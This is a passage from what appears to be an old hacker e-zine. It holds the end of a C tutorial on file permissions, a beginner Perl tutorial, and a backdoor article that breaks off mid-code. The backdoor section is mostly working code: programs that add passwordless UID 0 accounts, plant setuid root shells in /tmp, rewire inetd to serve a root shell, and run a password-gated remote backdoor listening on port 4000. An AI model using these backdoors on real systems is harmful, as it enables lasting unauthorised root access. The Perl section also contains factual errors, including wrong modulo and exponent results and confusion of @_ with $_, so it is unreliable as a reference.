to wherever the link happens to point to. While lstat actually returns info about the link itself. Fstat takes a fd to an open file and reads info about the file. The structure stat can be found in /usr/include/sys/stat.h and is defined as the following: struct stat { dev_t st_dev; /* device */ ino_t st_ino; /* inode */ mode_t st_mode; /* file permissions */ nlink_t st_nlink; /* number of hard links */ uid_t st_uid; /* user ID of the owner */ gid_t st_gid; /* group id of the owner */ dev_t st_rdev; /* device type*/ off_t st_size; /* total size in bytes */ unsigned long st_blcksize; /* blocksize for filesystem I/O */ unsigned long st_blocks; /* number of blocks */ time_t st_atime; /* time of last access */ time_t st_mtime; /* time of last modification */ time_t st_ctime; /* time of last change */ }; st_dev: This is the major and minor device numbers of a device on which the i-node associated with this file (and therefore the file itself) is stored. st_nlink: The number of links associated with a file. If a file has just been created, it has the value of '1'. This value is incremented by 1 for every hard link that is made to the file. st_rdev: If the file is a character-special or block-special device then this field contains the major and the minor dev numbers of the file. (Unlike st_dev which has the major and minor dev numbers of the device on which the file is stored.) st_atime: The last time the file was accessed for reading or the last time that it was executed, if executable. st_mtime: This is changed by write(), mknod(), utime(), and by changes in owner, group, hard link count, or mode. st_ctime: This is changed by writing and changes of i-node information (owner, group, link count, etc.) st_blksize: A hint to programs about the best buffer size to use for i/o operations on this file. st_blocks: The total number of physical blocks that are actually allocated on the disk for this file. st_mode member of struct stat defines both the file type and its permission bits. The following constants are used to determine the file type: S_IFMT: bitmask for the file type bitfields. S_IFREG: Regular file S_IFDIR: Directory S_IFCHR: Character device S_IFBLK: Block device S_IFLNK: Symbolic link S_IFIFO: FIFO file S_IFSOCK: socket There are also a set of POSIX macros to check the file type: S_ISREG: regular file. S_ISDIR: directory. S_ISCHR: character device. S_ISBLK: block device. S_ISLNK: symbolic link. S_ISFIFO: FIFO type file. S_ISSOCK: socket. The next constants, will give you information about a files ownership, permission values etc. S_ISUID: User ID bit set. S_ISGID: Group ID bit set. S_ISVTX: Sticky bit set. S_IRWXU: The owner has read, write and execution permission. S_IRUSR: The owner has read perms for the file (same as S_IREAD). S_IWUSR: The owner has write perms for the file (same as S_IWRITE). S_IXUSR: The owner has execute perms for the file (same as S_IEXEC). S_IRWXG: The group has read, write and execution permission. S_IRGRP: The group has read perms for the file. S_IWGRP: The group has write perms for the file. S_IXGRP: The group has execute perms for the file. S_IROTH: Everyone has read perms for the file. S_IWOTH: Everyone has write perms for the file. S_IXOTH: Everyone has execute perms for the file. ----->cut here<-------->cut here<-------->cut here<-------->cut here<---- <++> perms/mystat.c /* gcc mystat.c -o mystat */ /* includes */ #include #include #include #include /* prototypes */ char *filetype(mode_t); char *fileperms(mode_t); void statinfo(char *, struct stat *); void usage(char *prog) { printf("usage: %s \n",prog); exit(-1); } void main(int argc, char **argv) { struct stat st; if(argc != 2)usage(argv[0]); if(lstat(argv[1], &st) < 0) { perror(argv[1]); exit(-1); } statinfo(argv[1], &st); exit(0); } void statinfo(char *filename, struct stat *st) { printf("File Name:\t%s\n", filename); printf("File Type:\t%s\n", filetype(st->st_mode)); if(((st->st_mode & S_IFMT) != S_IFCHR) && ((st->st_mode & S_IFMT) != S_IFBLK)) { printf("File Size:\t%d bytes, %d blocks\n", st->st_size, st->st_blocks); printf("I/O Unit:\t%d bytes\n", st->st_blksize); }else{ printf("Device Numbers: Major: %u Minor: %u\n", major(st->st_rdev), minor(st->st_rdev)); } printf("Permissions:\t%s(%04o)\n", fileperms(st->st_mode),st->st_mode & 07777); printf("Inode Number:\t\t%u\n", st->st_ino); printf("Owner Userid:\t\t%d\n", st->st_uid); printf("Owner Group-id:\t\t%d\n", st->st_gid); printf("Hard link count:\t%d\n", st->st_nlink); printf("File system device: Major: %u Minor: %u\n", major(st->st_dev), minor(st->st_dev)); printf("Last access:\t\t%s", ctime(&st->st_atime)); printf("Last modification:\t%s", ctime(&st->st_mtime)); printf("Last i-node change:\t%s", ctime(&st->st_ctime)); } char *filetype(mode_t mode) { switch(mode & S_IFMT) { case S_IFREG: return("regular file"); case S_IFDIR: return("directory"); case S_IFCHR: return("character device"); case S_IFBLK: return("block device"); case S_IFLNK: return("symbolic link"); case S_IFIFO: return("fifo"); case S_IFSOCK: return("socket"); } return(NULL); } char *fileperms(mode_t mode) { int i; char *p; static char perms[10]; p = perms; strcpy(perms, "---------"); for(i=0;i<3;i++) { if(mode &(S_IREAD>>i*3)) *++p='r'; if(mode &(S_IWRITE>>i*3)) *++p='w'; if(mode &(S_IEXEC>>i*3)) *++p='x'; } if((mode & S_ISUID)) perms[2] = 's'; if((mode & S_ISGID)) perms[5] = 's'; if((mode & S_ISVTX)) perms[8] = 't'; return(perms); } <--> end of mystat.c -----------[ Changing file permissions in C If you need to change the file permissions, you can use this set of functions: chmod(const char *path, mode_t mode); fchmod(int fd, mode_t mode); For mode you can use the permission flags above or octal numbers. If your using octals, make sure they're always in a set of 5 numbers. example: use chmod("/tmp/bla", 00444) to make /tmp/bla readable for everyone. To change ownership, you can use these system calls: chown(const char *path, uid_t owner, gid_t group); lchown(const char *path, uid_t owner, gid_t group); fchown(int fd, uid_t owner, gid_t group); If owner/group is -1, the owner/group will remain the same as before. -----------[ Ending I hope you learned something new, although file permissions are really basic. For the next edition of the e-zine, I'll write some more difficult guides. Like always if you any further questions, remarks or anything. You can find me on IRC (irc.box5.net) in some channel. Until we meet again, lamagra out. ----[ EOF An introduction to perl =-=+=-=+=-=+=-=+=-=+=-=+=-=+=-= Perl: Volume 1 Hello and welcome to the Perl section of the list. This is Darkmo0n, Im gonna be writing some Perl tutorials for the list. When we're all done you should know enough Perl to make almost anything ya want. So.. lets get started already.. WHAT IS PERL: Perl (Practical Extraction and Reporting Language) and is an INTERPRETED language desgined by Larry Wall in the late 80's as a tool to create reports from many files on the UNIX operating system. As we learn more and more Perl, you will notice that many of its functions have to do with managing files, manipulating or searching strings or patterns. The fact that Perl is an interpreted language means that It does not need to be compiled or linked to be run, just a plain text file, like shell scripts. Unlike shell scripts, Perl offers the power and flexibility of high level languages like C, but does an excellent job of simplifying many tasks. For example, Perl internally handles all variable types. So the same variable can be used to hold strings, integers or other data types. And you can forget about malloc(), Perl handles all memory internally. As you'll see, Perl is extremly easy to learn, especially if you have any experiance with other programming languages, heh imagine.. even *I* learned Perl. GETTING PERL: Alright, in order to learn Perl, you need to get yourself the interpreter. It comes packaged with most Linux distributions. Check if you already have it: ----------------------------- Dark@darkness Dark >$ perl -v This is perl, version 5.005_03 built for i386-linux Copyright 1987-1999, Larry Wall Perl may be copied only under the terms of either the Artistic License or the GNU General Public License, which may be found in the Perl 5.0 source kit. Complete documentation for Perl, including FAQ lists, should be found on this system using `man perl' or `perldoc perl'. If you have access to the Internet, point your browser at http://www.perl.com/, the Perl Home Page. --------------------------- If you got a command not found, you can try other search utilities like whereis, locate, or find (Refer to the man pages if ya dont know how to use em). If you dont have Perl, run a search on freshmeat.net or another app finder to locate the latest version. For you guys stuck in Win9x (I pity you, really. Get Linux for God's sake!), you can go to www.activestate.com to get a version of perl that will work for you. NOTE: Not all commands that work *nix versions of Perl will work in the Win32 version (ex. getpwent(), and many of the file test functions). All perl scripts shown here are for the *nix version of perl. PERL LESSON 1: OK, now that we have perl up and running, lets start learning already. Perl programs, like all high-level programming language's programs, are made up of statements. Like in C, every Perl statement must end in a ; (semicolon), and white space is ignored. For example, print "hello"; is a valid Perl statement. print "hello" ; is ALSO valid. print; "hello" INVALID. print "hello" INVALID (No semicolon). Now, lets do everyone's first program in ANY new language, Hello World. (NOTE: Line numbers are for reference only, dont type em in) 1: #! /usr/bin/perl 2: print "Hello, World!\n"; Ok type that in in your favorite plain text editor (vi, notepad, pico whatever as long as it saves in plain text), and save it. To run a perl script in *NIX: Dark@darkness Dark >$ chmod +x hello.pl Dark@darkness Dark >$ ./hello.pl Hello, World! Dark@darkness Dark >$ In Windows: C:\> perl hello.pl Hello, World! C:\> Alright, now lets take a look at the program.... LINE 1: #! /usr/bin/perl That line contains the path to your Perl interpreter. ALL PERL PROGRAMS MUST START WITH THAT LINE. A program that doesnt start like that, will not run correctly. Also, if you want to run the interpreter with some command line options, you would include them there. For example, its good practice to run Perl with the -w switch, which increases the warnings on the scripts, which aids in debugging. To use the -w, change line 1 to: #! /usr/bin/perl -w LINE 2: print "Hello, World\n"; There's our first Perl statement, a print command. The syntax for print (for now) is: print "STRING"; Prints STRING to STDOUT. \n is known as an escape sequence. If your'e familiar with C, you know that \n represents a New line character, signals the end of a line of text on the screen. There are several legal escape sequences in Perl, here are the more widely used ones: \a : Alarm (*beep*) \t : Tab \n : New line \r : Carriage Return \0xx : ASCII code for a character in Octal notation \xXX : ASCII code for a character in Hex. There are a few other common ones, but those will be covered when we do Regular Expressions and Patterns. Comments in Perl are created by the #, pound sign. When a # is reached, the rest of the line is skipped. Notice the # on the first line of all Perl programs, that makes the interpreter skip that line. That line is for the shell/operating system's use only. #! /usr/bin/perl # print "This line wont execute\n"; $scalar = "adfas"; # this is a partial line comment Perl: Volume 2 - Variables & Operators Traditionally, the second lesson in any programming language is variables and data storage. Today, we will explore the 3 Perl variables types: Arrays, Scalars, and Hashes (No, there will be no pot in the hash section). After we cover the data types, we will also discuss mant of the simple operators Perl has to offer. After this lesson, you will know enough to make your own simple Perl programs. NOTE: Complete dominance of these topics is REQUIRED to become a good Perl programmer, ESPECIALLY the section on arrays and hashes, since these are the main components of any complex data structure you will be creating in Perl. ANOTHER NOTE: This volume is LONG (19 kb, four times more than the last one.), it took me three days to write it all. I recommend that you read the Variable section first, take a break, and then continue on the operators. If you attempt to read this all in one sitting, you are either really bored, or have a LOT of free time on your hands. FINAL NOTE BEFORE WE BEGIN: There are plenty of examples in this one, be sure to take a look at all of them and understand why they act the way they do. This will help you prevent many annoying bugs in your future programs. (For each of the examples I included, I have made those mistakes in the past with similar code, I included them so you wont have to.) ------------------------------------------------------------------------ PERL VARIABLES: Perl has 3 different kinds of variables: Scalars, Arrays and Hashes. Each of these can be used to hold numbers, integers, floating point numbers, characters, strings etc. People familiar in C will find this quite different from what they are used to: there are no variable "type". For example, a scalar can be first used to hold a number, and later, without any modification, can be reassigned to a string. To learn about the variable types, we need to know how to set them. The = Operator: The = operator assigns the value at the left, to the variable on the right. In Perl, when you assign a value to a scalar, it ALWAYS must begin with a $ (dollar sign), array variables ALWAYS must begin with a @ (an "at" sign) and hashes ALWAYS must begin with a % (percentage sign). Strings should always be in double quotes ("") or single quotes (''), since single back quotes (``) have special meaning in Perl (that will be covered later). Numeric values dont need to be quoted. ------------------------------------- NOTE: Variables in Perl are CASE SENSITIVE. $scalar, $SCALAR, and $ScALAR are *DIFFERENT* variables. Personally, I use variables that hold more more permanent settings in all caps, while all regular variables in lowercase. NOTE: Also, variable names in Perl must be all alphanumberic characters (0-9, a-z, A-Z, _). The first letter in the variable name cant be a _. For example: $address LEGAL $new! NOT LEGAL $_temp NOT LEGAL Variables that contain non-alphanumeric characters are set internally by Perl, such as $_, $<, $>, $| and $#array. LAST NOTE: Perl uses different variable space for each type of variable. You can have a scalar named $temp and an array named @temp defined at the same time: they wont interfere with each other. ------------------------------------- SCALARS: These variables hold single values or strings. For example: <++> perl/scalars.pl #! /usr/bin/perl -w $scalar = "This is a scalar variable:"; $scalar2 = 3.1415926; print "$scalar $scalar2\n"; <--> end scalars.pl OUTPUT: Dark@darkness work >$ chmod +x scalars.pl Dark@darkness work >$ ./scalars.pl This is a scalar variable: 3.1415926 Dark@darkness work >$ ARRAYS: These variables hold more than one string, and is indexed by numbers. NOTE: Array subscripts start counting, by default, at the number 0, like in many other languages. If you arent used to counting up from 0, you can change this by setting the special $[ scalar to the value you want to count from. Special variables, such as $[, $_, and others, will be discussed in detail in another volume. For example: <++> perl/arrays.pl #! /usr/bin/perl @array = (2, 3, 4, "data", 34.023, "Im a 3l33t Perl h4x0r"); print "$array[0]\n\n"; print "$array[5]\n"; <--> end arrays.pl OUTPUT: Dark@darkness Dark >$ chmod +x arrays.pl Dark@darkness Dark >$ ./arrays.pl 2 Im a 3l33t Perl h4x0r Dark@darkness Dark >$ Some of the most observant ones of you might be asking "Why the hell is there a $ infront of the array name, if its not a scalar??". This is a point of confusion to many people beginning in Perl. When you refer to the ENTIRE array, it is prefixed with a @. When you refer to individual elements of the array, it is prefixed with a $. You can assign values to members of an array like: $array[100] = "This is a string"; Or you can assign the whole array at once using a LIST. Lets look at the declaration of @array in the previous example: @array = (2, 3, 4, "data", 34.023, "Im a 3l33t Perl h4x0r"); This array is declared by a list. Lists are simply one or more values seperated by commas. Some Perl docs you may read refer to strings as lists with only one member, which is also correct. HASHES: Now everyone's favorite variable type, the hash. Hashes are the most powerful data types in Perl. Their use might not be apparent right away, but when you start programming more complicated programs, its existance will make your life SO much easier. A hash is exactly like an array, just that its values are indexed by strings, not numbers. <++> perl/hash.pl #! /usr/bin/perl %hash = ("RED", 0xFF0000, "GREEN", 0x00FF00, "BLUE", 0x0000FF); print "Red is: $hash{'RED'} in RGB\n"; print "Green is: $hash{'GREEN'} in RGB\n"; print "Blue is: $hash{'BLUE'} in RGB\n"; <--> end hash.pl OUTPUT: Dark@darkness Dark >$ chmod +x hash.pl Dark@darkness Dark >$ ./hash.pl Red is: 16711680 in RGB Green is: 65280 in RGB Blue is: 255 in RGB Dark@darkness Dark >$ Hrmm.. something didnt go as planned.. in the hash declaration, we put 0xFF0000 as RED, but the print function printed a "16711680". Why? In our declaration, 0xFF0000 was not quoted. Since it is a valid integer in hex, Perl changed it to decimal and then stored it into the hash. Then it was printed to stdout by print. How do we change this? In the declaration, quote the value for RED. This forces Perl to interpret it as a string, and does not do the conversion. OUTPUT: Dark@darkness Dark >$ ./hash.pl Red is: 0xFF0000 in RGB Green is: 0x00FF00 in RGB Blue is: 0x0000FF in RGB Dark@darkness Dark >$ Earlier we used the hex values in "numeric context," meaning that it was interpreted as a number. The second, it was used in string, or scalar context, meaning that it was interpreted as a string. Same values used in different contexts can have very different results. Here is another example using arrays: <++> perl/context.pl #! /usr/bin/perl @array = (23, 156, "this is an array"); $scalar = @array; $scalar2 = "@array"; print "$scalar\n"; print "$scalar2\n"; print "@array\n"; print "$array[0] $array[1] $array[2]\n"; <--> end context.pl OUTPUT: Dark@darkness Dark >$ chmod +x context.pl Dark@darkness Dark >$ ./context.pl 3 23 156 this is an array 23 156 this is an array 23 156 this is an array Dark@darkness Dark >$ Hrm.. thats strange.. we refered to the same array in different ways, but the first line looks different. Why? Lets look at how we use the variable.. $scalar = @array; ... print "$scalar\n"; Here, we use @array in numeric context.. and set that value to $scalar. When an array name is used in numeric context, it returns the NUMBER OF MEMBERS OF THE ARRAY. THIS IS *NOT* THE SUBSCRIPT OF THE LAST ARRAY VALUE. The last array value is @array - 1, or can also be obtained as $#array, a variable set internally by Perl that holds the subscript of the last array member. Ex: $members[$#members] returns the last member of array @members. The $#array variable can be increased, decreased, like any other variable, but changeing its value ALSO CHANGES THE SIZE OF THE ARRAY. For example: <++> perl/chsize.pl #! /usr/bin/perl @array = ("one", "two", "three"); $#array--; print "@array\n"; <--> end chsize.pl OUTPUT: Dark@darkness Dark >$ chmod +x chsize.pl Dark@darkness Dark >$ ./chsize.pl one two Dark@darkness Dark >$ Notice that the last member of the array is gone, since the array size was decreased. FUNCTIONS THAT ACT ON VARIABLES: Ok, now back to hashes.. Many of you might not immediately notice the importance of hashes, but lets explore them a bit more. We know that hashes are indexed by strings, and we also know that scalars and arrays also can hold strings... we can do some nice stuff... things like $hash{"$scalar"} returns the hash value indexed with the key of the contents of $scalar. If we use this convention, we might also need to know which keys exist in the hash. This is accomplished by the keys() call. SYNTAX: keys(%hash) Returns a list of all keys in %hash for example we can: @array = keys(%hash); and then loop through the members of @array, to find all the values in the hash. We can also determine whether a key exists in a hash, with the exists() call. SYNTAX: exists($hash{"key"}) Returns true if key exists in %hash, false otherwise. This is commonly used in conditional statements. and we can also delete a key from a hash using, you guessed it, the delete() call. SYNTAX: delete($hash{"key"}) Deletes key from %hash. After this is done, the value at that key will be also lost. Scalars and arrays also have the same type of commands: SYNTAX: defined($scalar), defined(@array); Returns true if $scalar or @array exists, false otherwise. Also used in conditionals. SYNTAX: undef($scalar), undef(@array); Undefines $scalar or @array. Contents of each will be lost. Undef is also used with many Perl functions that returns lists. For example: (undef, $file) = split(/=/, $scalar, 2); This split call returns a two member list of values. If we only want the second one, we can automatically undefine it, while keeping the second. Split will be covered later when we discuss regular expressions and string manipulation. SYNTAX: $scalar = join("string", @array); Converts an array into a single string, by joining all the members of the array, separating them by "string". For example: <++> perl/join.pl #! /usr/bin/perl @array = ("a", "random", "array", "of", "values", 23); $scalar = join("::", @array); print "$scalar\n"; <--> end join.pl OUTPUT: Dark@darkness Dark >$ ./join.pl a::random::array::of::values::23 Dark@darkness Dark >$ This function is mainly used to concatenate a whole array into a scalar to later print it to a sort of configuration file. Like, you have an array returned by getpwent(), and join it to create a copy of the /etc/passwd entry. SPECIAL VARIABLES: Perl has a LOT of special system variables which are automatically set on runtime. These variables control many aspects of the program, and also gives the program access to operating system data. @ARGV : Command line arguments Like in many other languages, the @ARGV array holds the arguments given after the program name at the command line. Unlike in C, $ARGV[0] does NOT hold the program name, it holds the first arguement after the program name. The name of the program is held in special varable $0. <++> perl/argv.pl #! /usr/bin/perl print "$0 @ARGV\n"; <--> end argv.pl OUTPUT: Dark@darkness Dark >$ ./argv.pl this is a test ./argv.pl this is a test Dark@darkness Dark >$ %ENV : Environment Variables This hash holds the names and values of all environment variables currently set. For example: $ENV{"PATH"} will return the contents of your PATH environment variable. Like any other hash , you can set new values to this one. $ENV{"TESTER"} = "blah"; This code fragment sets a new environment variable named TESTER to the string "blah". The delete(), and exists() functions can also be used on this hash. %SIG : Signals This hash is Perl's frontend for signal traping. In later volumes, we will use referances and this hash to create an unkillable process, and timeout counters. @_ : Default pattern and search space This is the mother of all Perl special variables. If its used in a subroutine, it holds the arguments passed to the sub. If used when reading from a file, its set to the data being currently read. If functions that regularly require a value to execute have that value ommited, they will use the contents of @_. For example: <++> perl/mother.pl #! /usr/bin/perl $_ = "This is a test\n"; print; <--> end mother.pl OUTPUT: Dark@darkness Dark >$ chmod +x mother.pl Dark@darkness Dark >$ ./mother.pl This is a test Dark@darkness Dark >$ Just remember, when you arent sure what data a function is working on, odds are that it is using @_. $< : Process UID Since we all are interested in suid programs (hehe), I decided to include this one in the last minute. $< returns the numeric uid of the process. Like any other variable, it can be set to other values. For example: $< = 0; This code frag is identical to doing setuid(0) in C. NOTE: Before you start making SUID root programs in Perl, let me warn you about something. Perl has a lot of security when it runs suid root, this security is called "taintedness". Later we will explore suid root programs and tainted variables, but until then, read: man perlsec. OK, thats all Im going to cover (for now) on Perl variables. I know its a long ass section, but you need to know this stuff so you can start fooling around with real Perl programs. ----------------------------------------------------------------------- If you havent taken a little break yet, DO IT NOW! Now we are gonna talk perl operators.... ----------------------------------------------------------------------- PERL OPERATORS: OK.. that mostly covers Perl data types.. now that we are all rested we will list many of the basic operators Perl offers. ++, -- Increment and Decrement. USAGE: $scalar++; ++$scalar; $scalar--; --$scalar; Increases or decreases the value of $scalar. NOTE: If the operator appears before the variable name, the variable is increased before it is used. If the operator is after the variable, it is decremented after the variable is used. This is only important if the increment or decrement is embedded in other Perl statements. When used alone, it really doesnt matter which convention you use. *, /, -, +, % Multiplication, Division, Subraction, Addition and Modulo USAGE: $scalar = 4 * 25; $scalar = 100 % 13; etc etc.. Performs mathmatical function depending on the symbol. I dont really think I need to show many examples of this.... most of you can add anyway ;) Modulo might be a bit unknown. It returns the remainder of the division of the two operands. For example: 5 % 2 return 3, because 5 divided by 2 is 1 remainder 3. Its most commonly used to print text after a set numbers of an iteration of a loop. An example of this will be given when we cover conditionals and loops in the next volume. ** Exponentiation USAGE: $scalar = 5 ** 2; Returns the value of the first operand to the power of the second. For example: $scalar = 2 ** 16; returns 65356, 2 to the power of 16. . Concatenation Operator USAGE: $scalar = "string1" . "string2"; $scalar = $var . $var2; This operator basically smushes both operators together into one string. For example: "one" . "two"; returns "onetwo". This is useful to combine the value of different scalars into one. Kinda like strcat() in C. ------------------------------------------------------------------ NOTE: The above operators (except ++ and --) can be written in shorthand. For example: $var = $var + 20; is equivalent to $var += 20; $var %= 3; is equal to $var = $var % 3; $var++; is equal to $var += 1; $var = $var . "string"; is equal to $var .= "string"; If you dont notice the pattern yet, msg me on IRC or email me =) ------------------------------------------------------------------ .. Sequence Operator USAGE: @array = (a .. z); This is one of my favorite operators, mainly because it turns a really long ass line of code into a simple statement. It returns a list of all values between the operands. For example: @array = (a .. z); print "@array\n"; This snippet of code prints out: a b c d e f g h i j k l m n o p q r s t u v w x y z. All of the values between the operand "a" and the operand "z". This also works for numbers, floating point numbers, etc etc. I mostly use this in foreach loops, which we will cover next volume. x Repetition operator USAGE: $scalar = "--" x 2; Repeats the STRING the number of times shown by the integer. EX: "xy" x 3; return "xyxyxy" &&, ||, ! Logical AND, OR, NOT These are usually used in conditionals, loops, or error checking. These will be discussed in more detail next volume. &, |, ^, <<, >> Bitwise AND, OR, XOR, Left shift, Right shift These operators modify the operands in at the binary level. The only time I *EVER* use these is to decode returning codes of a stat() call, or for encryption schemes. I wont be covering these, but you can read your Perl documentation for more info (man perlop). OK, that somewhat covers most of the operators we will be using in our tutorials. I left some out, such as ?:, =~, !~, \, ->, and // because they will better fit when we discuss their correspondig topics. Play around with these operators, some can give you unexpected, but kewl results.. for example.. try using ++ and -- on a scalar that holds the string "aa" or something similar. --------------------------------------------------------------------------- Alright, that concludes this volume of the Perl tutorial.. I know its quite long, but you wont see another one till mid August since Im going on vacation (wooohooo). Today we covered: The 3 types of Perl variables How to set variables Variable context Array sizes keys(), exists(), defined(), and other functions that act on variables Special Perl variables Basic Perl operators Play around with some of the stuff we talked about and you should know enough to make simple Perl programs. For example try a line like this in your code: $scalar = `/bin/date`; print "$scalar\n"; (THOSE ARE SINGLE BACK QUOTES) Perl is a language where EVERYTHING can be done in more than one way, mess around with what you already know, and you might come up with something cool. Laterz, Darkmo0n If ya have any suggestions, comments, or source code you want to contribute, drop me a note at perl@whereipretendtowork.com or talk to me on irc. NEXT VOLUME: Conditional statements and Loops. The Art of Backdoors =-=+=-=+=-=+=-=+=-=+=-=+=-=+=-= By Meb (Meb_@Piratededucation.com) Http://TriadSecurity.sacone.com/ This article is intended to teach you how to maintain root after you have gained it. It is defenantly from the hackers perspective, but could also be viewed at by the Admins perspective, on how to detect these backdoors and remove them. This article is not comprehensive, because their are so many ways to leave backdoors i could not possibly cover them all, but i'm sure it should explain certain methods and techniques for you to use. You've been trying to get into this box for a couple weeks, you've got your hands on a an acc but the privs are terrible. The box is known well around too be very secure, but now you know just how good the admin is. You've tried everything, imap, nis, suid exploits, bad permissions, race conditions, but nothing is working. Finally you stumble onto something which the admin overlooked and are quickly sitting on a root shell. But what now? How do you keep this accomplishment you've worked so long on? [Basics] -1. You can add a UID 0 account to the passwd file. This is not recommended because when the admin views the file, it will be increadably obvious that his box has been compromised, and you will probably lose your root position. Here's a short c prog i wrote which will add a UID 0 acc to /etc/passwd. <++> backdoor/backdoor1.c #include main() { FILE *fd; fd=fopen("/etc/passwd","a+"); fprintf(fd,"hax0r::0:0::/root:/bin/sh\n"); } <--> In a similar attempt you could enable an abondoned account and change it's uid to 0 and change the * in the second field. This method would obviosly be less obtrusive than the first Leave a suid shell in /tmp. Once the file is run you will have root privs again, this is everyone favorite but many box's run cronjobs every couple hours or when they reboot to clean out tmp, also many box's don't allow suid files to be executed. You can of course remove all these setbacks by editing /var/spool/cron/crontabs/root and /etc/fstab. Here's a little program that makes a suid shell called out in /tmp. <++> backdoor/backdoor2.c #include main() { system("cp /bin/sh /tmp/out"); system("chown root.root /tmp/out"); system("chmod 4755 /tmp/out"); } <--> [Intermediate] The super-server configuration file is not the first place a adminn will look, so obviosly is a good place to put a backdoor? But what makes these backdoors best, is that their remote, so you don't have to have a local account to regain root. First, some background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical lines look like this: (1) (2) (3) (4) (5) (6) (7) ftp stream tcp nowait root /usr/etc/ftpd ftpd talk dgram udp wait root /usr/etc/ntalkd ntalkd 1: This is the daemon name of the servie that appears in /etc/services. This tells inetd what to look for in /etc/services to determine which port it should associate the program name with. 2: This will tell inetd what type of connection to use when the session is establised . TCP uses streams, and UDP(The connectionless protocol) uses datagrams. 3: Protocol field, TCP or UDP. 4: This will tell inetd what the importance of the daemon is. A 'wait' flag indicates that the server will process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a child process to handle the connection, and then go back to sleep, waiting for further connections. 5: Is the user the daemon is run as. 6: Program to run when a connection arrives. 7: is the actual command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally. This is done with an 'internal' flag in fields (6) and (7). So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it with something else. You could make it spawn a program that adds a UID 0 acc, or creates a suid shell. To take over a service like daytime and instead of telling you the time it would drop you to a suid root shell, try something like this. Change the line in /etc/indetd.conf that looks like this: daytime stream tcp nowait root internal And change it to: daytime stream tcp nowait /bin/sh sh -i. Now you've done this, so you decide to go test it out. You try and it says "Unable to establish conection", whats wrong? Well in order for these changes to take place you need to restart inetd, you could wait for the box to reboot, but who's patient? Just do a "killalll -9 inetd" and it will automatically restart itself. Another thing you could do was make a fake service and make it spawn a program which would be more secure, such as password protected, and have better options, so that you would have the power to modify the system further remotley without the dificulties of not running off of telnetd. Here is a program that will bind to any port and wait, it will not give a prompt, simply put in the password and you will be given a menu of options. This code was written by theft shortly before he left the scene so it's might have a few bugs in it as well as some unworking functions. <++> backdoor/remoteback.c /* Coders: Theft Help from: Sector9, Halogen Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen, Psionic, g0d, Psionic. Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH), Global Hell(gH), Team Sploit, Hong Kong Danger Duo, Tg0d, EHAP. Usage: Setup: # gcc -o backhore backhore.c # ./backdoor password & Run: Telnet to the host on port 4000. After connected you Will not be prompted for a password, this way it is less Obvious, just type the password and press enter, after this You will be prompted for a command, pick 1-8. Distributers: Ethical Mutiny Crew */ #include #include #include #include #include #include #include #include #define PORT 4000 #define MAXDATASIZE 100 #define BACKLOG 10 #define SA struct sockaddr /* leaner meaner code */ void handle(int); int main(int argc, char *argv[]) { int sockfd, new_fd, sin_size, numbytes, cmd; char ask[10]="Command: "; char *bytes, *buf, pass[40]; struct sockaddr_in my_addr; struct sockaddr_in their_addr; printf("\n Backhore BETA by Theft\n"); printf(" 1: trojans rc.local\n"); printf(" 2: sends a systemwide message\n"); printf(" 3: binds a root shell on port 2000\n"); printf(" 4: creates suid sh in /tmp\n"); printf(" 5: creates mutiny account uid 0 no passwd\n"); printf(" 6: drops to suid shell\n"); printf(" 7: information on backhore\n"); printf(" 8: contact\n"); if (argc != 2) { fprintf(stderr,"Usage: %s password\n", argv[0]); exit(1); } strncpy(pass, argv[1], 40); printf("..using password: %s..\n", pass); if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } my_addr.sin_family = AF_INET; my_addr.sin_port = htons(PORT); my_addr.sin_addr.s_addr = INADDR_ANY; if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) { perror("bind"); exit(1); } if (listen(sockfd, BACKLOG) == -1) { perror("listen"); exit(1); } sin_size = sizeof(SA); while(1) { /* main accept() loop */ if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) { perror("accept"); continue; } if (!fork()) { dup2(new_fd, 0); dup2(new_fd, 1); dup2(new_fd, 2); fgets(buf, 40, stdin); if (!strcmp(buf, pass)) { printf("%s", ask); cmd = getchar(); handle(cmd); } close(new_fd); exit(0); } close(new_fd); while(waitpid(-1,NULL,WNOHANG) > 0); /* rape the dying children */ } } void handle(int cmd) { FILE *fd; switch(cmd) { case '1': printf("\nBackhore BETA by Theft\n"); printf("theft@cyberspace.org\n"); printf("Trojaning rc.local\n"); fd = fopen("/etc/passwd", "a+"); fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh"); fclose(fd); printf("Trojan complete.\n"); break; case '2': printf("\nBackhore BETA by Theft\n"); printf("theft@cyberspace.org\n"); printf("Sending systemwide message..\n"); system("wall Box owned via the Ethical Mutiny Crew"); printf("Message sent.\n"); break; case '3': printf("\nBackhore BETA by Theft\n"); printf("theft@cyberspace.org\n"); printf("\nAdding inetd backdoor... (-p)\n"); fd = fopen("/etc/services","a+"); fprintf(fd,"backdoor\t2000/tcp\tbackdoor\n"); fd = fopen("/etc/inetd.conf","a+"); fprintf(fd,"backdoor\tstream\ttcp\tnowait\troot\t/bin/sh -i\n"); execl("killall", "-HUP", "inetd", NULL); printf("\ndone.\n"); printf("telnet to port 2000\n\n"); break; case '4': printf("\nBackhore BETA by Theft\n"); printf("theft@cyberspace.org\n"); printf("\nAdding Suid Shell... (-s)\n"); system("cp /bin/sh /tmp/.sh"); system("chmod 4700 /tmp/.sh"); system("chown root:root /tmp/.sh"); printf("\nSuid shell added.\n"); printf("execute /tmp/.sh\n\n"); break; case '5': printf("\nBackhore BETA by Theft\n"); printf("theft@cyberspace.org\n"); printf("\nAdding root account... (-u)\n"); fd=fopen("/etc/passwd","a+"); fprintf(fd,"hax0r::0:0::/:/bin/bash\n"); printf("\ndone.\n"); printf("uid 0 and gid 0 account added\n\n"); break; case '6': printf("\nBackhore BETA by Theft\n"); printf("theft@cyberspace.org\n"); printf("Executing suid shell..\n"); execl("/bin/sh"); break; case '7': printf("\nBackhore BETA by Theft\n"); printf("theft@cyberspace.org\n"); printf("\nInfo... (-i)\n"); printf("\n3 - Adds 